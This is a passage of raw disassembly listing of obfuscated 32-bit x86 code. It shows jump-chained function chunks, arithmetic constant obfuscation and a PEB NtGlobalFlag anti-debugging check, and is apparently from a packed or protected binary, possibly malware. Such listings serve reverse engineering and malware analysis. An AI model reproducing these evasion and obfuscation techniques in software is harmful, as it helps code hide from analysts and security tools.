sub_42C89F endp
; =============== S U B R O U T I N E =======================================
sub_42C8C0 proc near ; CODE XREF: _0182ofla:00424561�j
; sub_42D056+411�p
; FUNCTION CHUNK AT 00425D4B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042D295 SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
cmp dword ptr [eax-0Ch], 4
jnz loc_42C8D7
add dword ptr [ebp-8], 4
jmp loc_42D295
; ---------------------------------------------------------------------------
loc_42C8D7: ; CODE XREF: sub_42C8C0+8�j
add dword ptr [ebp-8], 2
jmp loc_42D295
sub_42C8C0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_42C8E0: ; CODE XREF: sub_425B00:loc_426821�j
; sub_425B00+77B5�j
test byte ptr [ebp-8], 20h
jmp loc_428939
; END OF FUNCTION CHUNK FOR sub_425B00
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_42C8E9: ; CODE XREF: sub_4298DD:loc_42B8CA�j
xchg eax, [esp+0]
push 10h
mov eax, [ebp+8]
push eax
push eax
push 0C6EC1CA6h
pop eax
jmp loc_42B2BD
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
loc_42C8FE: ; CODE XREF: _0182ofla:loc_42D290�j
sub esi, ebp
jmp loc_426058
; ---------------------------------------------------------------------------
loc_42C905: ; CODE XREF: _0182ofla:0042A9E7�j
pop ecx
; =============== S U B R O U T I N E =======================================
sub_42C906 proc near ; CODE XREF: sub_427445+4036�p
; FUNCTION CHUNK AT 00423DC6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427E6A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042B3A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ED04 SIZE 00000007 BYTES
xchg esi, [esp+0]
pop esi
mov eax, large fs:30h
mov eax, [eax+68h]
test eax, 70h
jz loc_428CAC
jmp loc_423DC6
sub_42C906 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42583B
loc_42C924: ; CODE XREF: sub_42583B+393B�j
mov edi, 254F5B55h
loc_42C929: ; CODE XREF: sub_42583B:loc_42C770�j
mov eax, [ebp-4]
mov eax, [eax]
and eax, 0FFFFFFh
cmp eax, 0C3C033h
jnz loc_428E3A
jmp loc_425CFA
; END OF FUNCTION CHUNK FOR sub_42583B
; ---------------------------------------------------------------------------
lea eax, [ebp-14h]
call sub_42A592
; START OF FUNCTION CHUNK FOR sub_42A51F
loc_42C94B: ; CODE XREF: sub_42A51F+8�j
jmp nullsub_105
; END OF FUNCTION CHUNK FOR sub_42A51F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428729
loc_42C950: ; CODE XREF: sub_428729:loc_42783B�j
add esi, ebp
add esi, eax
test ebx, ecx
jmp loc_42360A
; END OF FUNCTION CHUNK FOR sub_428729
; =============== S U B R O U T I N E =======================================
sub_42C95B proc near ; DATA XREF: sub_4242FD+9F08�o
mov [edi], eax
pop edi
retn
sub_42C95B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42C95F: ; CODE XREF: _0182ofla:0042E0C0�j
jmp loc_427885
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B097
loc_42C964: ; CODE XREF: sub_42B097+1�j
jmp loc_42CAB7
; END OF FUNCTION CHUNK FOR sub_42B097
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E689
loc_42C969: ; CODE XREF: sub_42E689+2�j
rol eax, 0Ah
push eax
push offset sub_423716
jmp loc_426CCD
; END OF FUNCTION CHUNK FOR sub_42E689
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_42. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42C978: ; CODE XREF: _0182ofla:00425F2E�j
popf
; =============== S U B R O U T I N E =======================================
sub_42C979 proc near ; CODE XREF: _0182ofla:0042E108�p
mov [esp+0], ebx
pop ebx
lea eax, [ebp-0Ch]
push eax
sub_42C979 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_425063
loc_42C981: ; CODE XREF: sub_425063+E�j
mov eax, [ebp-8]
push eax
jmp loc_425917
; END OF FUNCTION CHUNK FOR sub_425063
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42C98A: ; CODE XREF: sub_42D056-8283�j
jnp loc_42A84E
jmp loc_42D414
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
loc_42C995: ; CODE XREF: _0182ofla:00429D3A�j
rol ebp, 15h
; =============== S U B R O U T I N E =======================================
sub_42C998 proc near ; CODE XREF: sub_426319+5DFB�p
arg_C = dword ptr 10h
; FUNCTION CHUNK AT 0042EBAB SIZE 0000000C BYTES
xchg ecx, [esp+0]
pop ecx
or ebx, ecx
and eax, 6816E9B3h
xor eax, ebx
add edx, eax
xor eax, 0D4FBA740h
jmp loc_42EBAB
sub_42C998 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
js loc_427359
pushf
jmp sub_429D83
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_42C9BF: ; CODE XREF: sub_4298DD:loc_42492F�j
; sub_4298DD-558�j
push 7BC56260h
xor [esp+4+var_4], 7BC56260h
push eax
push 50317EF9h
pop eax
add eax, 7B008C92h
rol eax, 1Dh
add eax, 8699BE8Fh
jmp loc_42B8CA
; END OF FUNCTION CHUNK FOR sub_4298DD
; =============== S U B R O U T I N E =======================================
sub_42C9E6 proc near ; DATA XREF: _0182ofla:00423437�o
; FUNCTION CHUNK AT 00425831 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D7E2 SIZE 0000000E BYTES
push 6F40FB72h
pop esi
or esi, 2E95202Eh
jns loc_42D7E2
sub_42C9E6 endp
; START OF FUNCTION CHUNK FOR sub_4258F5
loc_42C9F8: ; CODE XREF: sub_4258F5+9�j
jmp loc_425C38
; END OF FUNCTION CHUNK FOR sub_4258F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_42C9FD: ; CODE XREF: sub_42537E+E�j
jmp loc_42740F
; END OF FUNCTION CHUNK FOR sub_42537E
; ---------------------------------------------------------------------------
mov edi, 78C0922Ah
jmp loc_42D7D9
; ---------------------------------------------------------------------------
dd 0CF8BF681h, 8A0F5B31h, 0FFFFD0BBh, 0FFCA3EE9h
db 0FFh
; ---------------------------------------------------------------------------
loc_42CA1D: ; DATA XREF: sub_42798F:loc_42A7D0�o
mov dword ptr [ebp-8], 1
jmp loc_42AB5A
; =============== S U B R O U T I N E =======================================
sub_42CA29 proc near ; CODE XREF: sub_42E35C-A7F3�j
; sub_4298DD+3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00425413 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426DF4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00427DCC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A1BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A346 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042B0A9 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042C729 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042E149 SIZE 0000000A BYTES
js loc_42E149
call sub_4235C7
loc_42CA34: ; CODE XREF: sub_4276BF+22AD�j
test edi, 7AAB88CEh
jmp loc_42C729
sub_42CA29 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42CA3F: ; CODE XREF: _0182ofla:0042A467�j
add dword ptr [ebp-8], 2
jmp loc_42412F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CA48 proc near ; CODE XREF: sub_425B00+A�p
; sub_4294AA+4�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
jmp loc_42ECBB
sub_42CA48 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DBF0
loc_42CA5C: ; CODE XREF: sub_42DBF0:loc_428D9D�j
mov ds:dword_427A20, eax
jmp loc_42D379
; END OF FUNCTION CHUNK FOR sub_42DBF0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CA66 proc near ; CODE XREF: sub_42DBF0�j
; FUNCTION CHUNK AT 0042DC2D SIZE 00000013 BYTES
push ebp
mov ebp, esp
push ecx
cmp ds:dword_427A20, 0
jz loc_426F91
jmp loc_42DC2D
sub_42CA66 endp
; ---------------------------------------------------------------------------
locret_42CA7C: ; CODE XREF: _0182ofla:loc_425D3C�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C553
loc_42CA7D: ; CODE XREF: sub_42C553+D�j
jmp loc_424971
; END OF FUNCTION CHUNK FOR sub_42C553
; ---------------------------------------------------------------------------
locret_42CA82: ; CODE XREF: _0182ofla:0042E346�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E734
loc_42CA83: ; CODE XREF: sub_42E734+7�j
jmp loc_42515C
; END OF FUNCTION CHUNK FOR sub_42E734
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_42CA88: ; CODE XREF: sub_425BF8-4D0�j
jmp loc_423448
; END OF FUNCTION CHUNK FOR sub_425BF8
; ---------------------------------------------------------------------------
loc_42CA8D: ; CODE XREF: _0182ofla:00428138�j
shr eax, 7
; START OF FUNCTION CHUNK FOR sub_42AB3E
loc_42CA90: ; CODE XREF: sub_42AB3E-7564�j
or eax, ebx
add esi, 5FF7425Eh
shl esi, 6
jmp loc_42D884
; END OF FUNCTION CHUNK FOR sub_42AB3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42326C
loc_42CAA0: ; CODE XREF: sub_42326C:loc_424685�j
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_424C20
or eax, eax
jnz loc_426075
jmp loc_426BB6
; END OF FUNCTION CHUNK FOR sub_42326C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B097
loc_42CAB7: ; CODE XREF: sub_42B097:loc_42C964�j
mov ebp, esp
jns sub_423A42
push offset sub_423FFB
jmp nullsub_107
; END OF FUNCTION CHUNK FOR sub_42B097
; =============== S U B R O U T I N E =======================================
sub_42CAC9 proc near ; CODE XREF: _0182ofla:00423281�j
; sub_42D056:loc_42CBF6�p
; FUNCTION CHUNK AT 00424697 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
mov [ebp-8], eax
push 2
push offset sub_42B73E
jmp loc_424697
sub_42CAC9 endp
; ---------------------------------------------------------------------------
jnb loc_42924E
jmp sub_426046
; ---------------------------------------------------------------------------
neg eax
sbb eax, eax
neg eax
mov [ebp-5], al
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42CAF0: ; CODE XREF: sub_42798F:loc_427A2D�j
jnb loc_428155
push offset sub_429203
jmp nullsub_111
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_42CB00 proc near ; DATA XREF: sub_42798F:loc_42B4BF�o
; FUNCTION CHUNK AT 0042AB64 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D3BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E3B6 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042EB91 SIZE 0000001A BYTES
xchg edx, [esp+0]
mov eax, edx
pop edx
or eax, ds:4000F6h
add eax, 943132h
mov eax, [eax]
or eax, eax
jnz loc_42827B
jmp loc_42AB64
sub_42CB00 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jmp loc_425D92
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42CB26: ; CODE XREF: sub_423A2A+45E8�j
jnz loc_425926
push edi
push 1CF355C4h
call sub_4276E3
loc_42CB37: ; CODE XREF: sub_42D76D+1D�j
jmp loc_428501
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424707
loc_42CB3C: ; CODE XREF: sub_424707:loc_42B548�j
pop edx
or edx, 6B34448Ch
xor edx, 22F228A3h
add ebx, edx
pop edx
add edx, eax
jmp loc_42C523
; END OF FUNCTION CHUNK FOR sub_424707
; =============== S U B R O U T I N E =======================================
sub_42CB53 proc near ; DATA XREF: _0182ofla:loc_42D0F8�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00425808 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042861A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428F72 SIZE 0000000A BYTES
push eax
push eax
push 103CBA99h
xchg ecx, [esp+0Ch+var_C]
mov eax, ecx
pop ecx
jmp loc_42861A
sub_42CB53 endp
; ---------------------------------------------------------------------------
loc_42CB65: ; CODE XREF: _0182ofla:loc_42CEE5�j
; _0182ofla:0042CEF8�j
add edx, 0DE2CAA62h
call sub_42D71D
call sub_429BA2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_53. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424184
loc_42CB76: ; CODE XREF: sub_424184+5254�j
jmp nullsub_114
; END OF FUNCTION CHUNK FOR sub_424184
; ---------------------------------------------------------------------------
loc_42CB7B: ; CODE XREF: _0182ofla:00428657�j
jmp loc_42726F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CD0
loc_42CB80: ; CODE XREF: sub_427CD0+9�j
jmp loc_42AEDC
; END OF FUNCTION CHUNK FOR sub_427CD0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426571
loc_42CB85: ; CODE XREF: sub_426571:loc_427164�j
pop edx
retn
; END OF FUNCTION CHUNK FOR sub_426571
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A760
loc_42CB87: ; CODE XREF: sub_42A760+2481�j
jmp loc_428BF8
; END OF FUNCTION CHUNK FOR sub_42A760
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9A4
loc_42CB8C: ; CODE XREF: sub_42D9A4:loc_4273A2�j
rol eax, 12h
push edx
mov [esp+0], eax
retn
; END OF FUNCTION CHUNK FOR sub_42D9A4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_42CB94: ; CODE XREF: sub_425B00+35A1�j
jmp loc_42A76D
; END OF FUNCTION CHUNK FOR sub_425B00
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_42CB99: ; CODE XREF: sub_4282B8-37F5�j
pop edi
loc_42CB9A: ; CODE XREF: sub_4282B8-380C�j
add ebx, 0A25211D9h
push offset sub_42628D
jmp loc_42A1C9
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
mov dword ptr [ebp-4], 1
mov eax, 0
or eax, eax
jz loc_42A79E
jmp loc_428AF4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427259
loc_42CBC3: ; CODE XREF: sub_427259:loc_4276FE�j
pop ebp
loc_42CBC4: ; CODE XREF: _0182ofla:00424416�j
push 7E147C2h
pop eax
add eax, 0F861100Eh
jmp loc_42C3E3
; END OF FUNCTION CHUNK FOR sub_427259
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_164. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D81E
loc_42CBD6: ; CODE XREF: sub_42D81E+10�j
jmp loc_426364
; END OF FUNCTION CHUNK FOR sub_42D81E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A760
loc_42CBDB: ; CODE XREF: sub_42A760+8�j
jz loc_42C390
jmp loc_42CB87
; END OF FUNCTION CHUNK FOR sub_42A760
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42CBE6: ; CODE XREF: sub_42798F+28A3�j
pushf
cdq
push eax
loc_42CBE9: ; CODE XREF: sub_42798F:loc_42B7C0�j
push 1
lea eax, [ebp-800h]
jmp loc_42665D
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42CBF6: ; CODE XREF: sub_42D056:loc_428428�j
call sub_42CAC9
; END OF FUNCTION CHUNK FOR sub_42D056
; START OF FUNCTION CHUNK FOR sub_42448C
loc_42CBFB: ; CODE XREF: sub_42448C:loc_42980C�j
mov eax, [eax]
add eax, [ebp+var_4]
add eax, 18h
mov [ebp+var_10], eax
jmp loc_42AA86
; END OF FUNCTION CHUNK FOR sub_42448C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_42CC0B: ; CODE XREF: sub_425B6E:loc_428ABA�j
add [esi], ecx
xor [esi], edx
mov eax, 80000003h
xor ebx, ebx
xor ecx, ecx
xor edx, edx
jmp loc_424964
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A915
loc_42CC1F: ; CODE XREF: sub_42A915:loc_427CFA�j
; sub_42A915-966�j
call sub_42E01D
loc_42CC24: ; CODE XREF: sub_427967+10�j
jmp loc_42398C
; END OF FUNCTION CHUNK FOR sub_42A915
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_42CC29: ; CODE XREF: sub_425BF8:loc_4260F6�j
jnz loc_42481C
jmp loc_427EF9
; END OF FUNCTION CHUNK FOR sub_425BF8
; =============== S U B R O U T I N E =======================================
sub_42CC34 proc near ; CODE XREF: sub_42AA7A�j
; DATA XREF: sub_42AA62+E�o
; FUNCTION CHUNK AT 0042DC55 SIZE 00000005 BYTES
push esi
push 75A14B32h
pop esi
rol esi, 1Fh
jmp loc_42DC55
sub_42CC34 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C553
loc_42CC43: ; CODE XREF: sub_42C553:loc_42AFDA�j
pop ecx
loc_42CC44: ; CODE XREF: _0182ofla:00423B70�j
; sub_427ED1+1B54�j
js loc_424218
cmp dword ptr [ebp-4], 0
jnz loc_428B5E
jmp loc_42A67C
; END OF FUNCTION CHUNK FOR sub_42C553
; =============== S U B R O U T I N E =======================================
sub_42CC59 proc near ; CODE XREF: sub_42CC59:loc_427C56�p
; _0182ofla:0042E337�j
; FUNCTION CHUNK AT 00425D04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004268E2 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00427C56 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004297BA SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042D29F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E8F4 SIZE 00000007 BYTES
xchg eax, [esp+0]
pop eax
jns loc_4297BA
push 9E24434h
mov eax, ecx
jmp loc_429FB9
sub_42CC59 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42CC6F: ; CODE XREF: sub_428D63:loc_42DE5E�j
; _0182ofla:0042DE78�j
xor eax, 0C81EB03Bh
add eax, ebp
push edi
push 31FD25Dh
pop edi
add edi, 3C65C033h
add eax, edi
jmp loc_423AA4
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4271AD
loc_42CC8B: ; CODE XREF: sub_4271AD+14�j
push 0
push 0FFFFFFFFh
push offset sub_42E734
jmp nullsub_118
; END OF FUNCTION CHUNK FOR sub_4271AD
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42CC99 proc near ; CODE XREF: sub_425BED:loc_42E070�j
retn
sub_42CC99 endp
; ---------------------------------------------------------------------------
loc_42CC9A: ; CODE XREF: _0182ofla:0042EC43�j
jmp loc_427023
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E218
loc_42CC9F: ; CODE XREF: sub_42E218:loc_428C17�j
mov eax, ebp
xchg eax, [esp+4+var_4]
mov ebp, esp
xchg ecx, esi
push esi
xchg ecx, esi
mov esp, ebp
pop ebp
jmp loc_425CE7
; END OF FUNCTION CHUNK FOR sub_42E218
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4254D3
loc_42CCB3: ; CODE XREF: sub_4254D3:loc_423090�j
push offset loc_4250BA
jmp loc_42E631
; END OF FUNCTION CHUNK FOR sub_4254D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42CCBD: ; CODE XREF: sub_423A2A+464A�j
mov al, [eax]
sub al, 99h
mov edx, ds:dword_427A24
imul byte ptr [edx]
cmp al, 0A4h
jmp loc_4246C3
; END OF FUNCTION CHUNK FOR sub_423A2A
; =============== S U B R O U T I N E =======================================
sub_42CCD0 proc near ; DATA XREF: _0182ofla:004265AC�o
; FUNCTION CHUNK AT 00424FF0 SIZE 00000005 BYTES
call sub_42D71D
push offset sub_4252A2
jmp loc_424FF0
sub_42CCD0 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_96. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42CCE0 proc near ; DATA XREF: sub_42D03E-62C6�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004261E7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004272A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042929E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042D72B SIZE 00000005 BYTES
mov eax, ds:dword_427144
or eax, eax
jnz loc_42929E
jmp loc_4272A1
sub_42CCE0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42CCF3: ; CODE XREF: _0182ofla:004248A9�j
jle loc_424B3A
; START OF FUNCTION CHUNK FOR sub_428336
loc_42CCF9: ; CODE XREF: sub_428336:loc_42488D�j
add edi, 82A083F8h
call sub_425D8F
; END OF FUNCTION CHUNK FOR sub_428336
; START OF FUNCTION CHUNK FOR sub_42662C
loc_42CD04: ; CODE XREF: sub_42662C+FE0�j
jmp loc_4241F8
; END OF FUNCTION CHUNK FOR sub_42662C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42349B
loc_42CD09: ; CODE XREF: sub_42349B+20A9�j
not eax
adc ebx, 0E79D6B9Ah
loc_42CD11: ; CODE XREF: sub_42349B:loc_4284DC�j
mov eax, [ebp-4]
xor edx, edx
jmp loc_42DB61
; END OF FUNCTION CHUNK FOR sub_42349B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_72. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jge nullsub_158
jmp sub_423F65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428729
loc_42CD27: ; CODE XREF: sub_428729+19�j
push 400h
loc_42CD2C: ; CODE XREF: sub_427942:loc_423372�j
mov eax, [ebp-8]
push eax
mov eax, [ebp-30h]
push eax
call sub_426020
jmp loc_4294DF
; END OF FUNCTION CHUNK FOR sub_428729
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_144. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42CD3F: ; CODE XREF: _0182ofla:00426F87�j
jmp loc_42AEBB
; =============== S U B R O U T I N E =======================================
sub_42CD44 proc near ; CODE XREF: _0182ofla:00425CCA�j
; sub_423AF2+A43A�p
; FUNCTION CHUNK AT 00425148 SIZE 0000000B BYTES
xchg eax, [esp+0]
pop eax
push edi
push 94B85A19h
pop edi
jmp loc_425148
sub_42CD44 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_42CD54: ; CODE XREF: sub_425DA5:loc_429356�j
rol ebx, 17h
add ebx, 53164694h
xchg ebx, [esp+4+var_4]
jmp sub_42AB27
; END OF FUNCTION CHUNK FOR sub_425DA5
; ---------------------------------------------------------------------------
loc_42CD65: ; CODE XREF: _0182ofla:0042E727�j
jle loc_425C96
test eax, ebx
jmp loc_42B1F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425EA5
loc_42CD72: ; CODE XREF: sub_425EA5:loc_424544�j
shl eax, 3
add [ebp-8], eax
mov eax, [ebp-8]
shr eax, 0Bh
jmp loc_42E494
; END OF FUNCTION CHUNK FOR sub_425EA5
; ---------------------------------------------------------------------------
and ecx, edx
jmp sub_42E574
; ---------------------------------------------------------------------------
shl eax, 1Fh
test ecx, ebp
jmp loc_425617
; ---------------------------------------------------------------------------
loc_42CD94: ; CODE XREF: _0182ofla:00426D93�j
jge loc_42B1D8
; START OF FUNCTION CHUNK FOR sub_428A39
loc_42CD9A: ; CODE XREF: sub_428A39:loc_426D82�j
or esi, 7DC7434h
add esi, 0B82281C4h
xchg esi, [esp+0]
jmp loc_423896
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429203
loc_42CDAE: ; CODE XREF: sub_429203:loc_42A204�j
jz loc_42557F
jmp loc_42D99F
; END OF FUNCTION CHUNK FOR sub_429203
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A642
loc_42CDB9: ; CODE XREF: sub_42A642-1261�j
and ecx, 0F23DFF60h
loc_42CDBF: ; CODE XREF: sub_42A642:loc_4276B4�j
call sub_428D17
mov edx, 0C231F698h
call sub_42D71D
push eax
ror eax, 19h
mov ds:dword_42B8E0, eax
jmp nullsub_122
; END OF FUNCTION CHUNK FOR sub_42A642
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42433C
loc_42CDDD: ; CODE XREF: sub_42433C-6E0�j
add edx, edi
call sub_426CF9
locret_42CDE4: ; CODE XREF: sub_423A42:loc_42C123�j
retn
; END OF FUNCTION CHUNK FOR sub_42433C
; ---------------------------------------------------------------------------
loc_42CDE5: ; CODE XREF: _0182ofla:0042669C�j
jle loc_424BC1
; =============== S U B R O U T I N E =======================================
sub_42CDEB proc near ; CODE XREF: sub_42A995+3�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00428434 SIZE 00000013 BYTES
xchg ebx, [esp+0]
pop ebx
push ecx
push 9F37D185h
pop ecx
sub ecx, 0E49764Eh
jmp loc_428434
sub_42CDEB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42CE01 proc near ; DATA XREF: _0182ofla:0042E8B3�o
mov esp, ebp
pop ebp
mov eax, ds:dword_424BEC
call sub_428110
sub_42CE01 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4272F4
loc_42CE0F: ; CODE XREF: sub_4272F4:loc_42B298�j
mov edx, esp
push edx
push 0DB749746h
add [esp+20h+var_20], 248B68BAh
push eax
lea eax, sub_427942
push eax
jmp loc_42DDC3
; END OF FUNCTION CHUNK FOR sub_4272F4
; ---------------------------------------------------------------------------
cmp ecx, eax
jmp loc_425E0B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42940E
loc_42CE32: ; CODE XREF: sub_42940E:loc_42882A�j
jz loc_427C02
jmp loc_426CA7
; END OF FUNCTION CHUNK FOR sub_42940E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F0F
loc_42CE3D: ; CODE XREF: sub_428F0F-2BD�j
add edi, ebx
or ecx, 2509DDB3h
and eax, esi
loc_42CE47: ; CODE XREF: sub_428F0F:loc_424E57�j
push 999BE8B8h
pop eax
add eax, 0F05C262Dh
add eax, ebp
add eax, 7607F107h
jmp loc_42711E
; END OF FUNCTION CHUNK FOR sub_428F0F
; =============== S U B R O U T I N E =======================================
sub_42CE60 proc near ; CODE XREF: sub_424E6E+8375�p
; FUNCTION CHUNK AT 0042934D SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042A1C4 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
push ebp
mov ebp, eax
jmp loc_42A1C4
sub_42CE60 endp
; ---------------------------------------------------------------------------
adc ebp, esi
jmp sub_42A4C6
; =============== S U B R O U T I N E =======================================
sub_42CE73 proc near ; CODE XREF: _0182ofla:0042535A�j
; _0182ofla:loc_425D89�j ...
; FUNCTION CHUNK AT 004266E7 SIZE 0000000B BYTES
mov [esp+0], ecx
pop ecx
call sub_428D17
push 1F201766h
jmp loc_4266E7
sub_42CE73 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42CE86 proc near ; CODE XREF: sub_427942+5B8D�p
; _0182ofla:0042EBCB�j
xchg eax, [esp+0]
pop eax
pushf
push offset loc_428648
jmp nullsub_124
sub_42CE86 endp
; ---------------------------------------------------------------------------
or edi, eax
jmp sub_42A0B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249FA
loc_42CE9C: ; CODE XREF: sub_4249FA:loc_425F81�j
xchg edi, [esp+4+var_4]
jmp sub_424CD8
; END OF FUNCTION CHUNK FOR sub_4249FA
; =============== S U B R O U T I N E =======================================
sub_42CEA4 proc near ; CODE XREF: _0182ofla:00427304�j
; sub_42883C+7�p
; FUNCTION CHUNK AT 00428C35 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042AEF2 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov edx, [ebp+8]
mov edx, [edx-8]
or edx, 40h
jmp loc_42AEF2
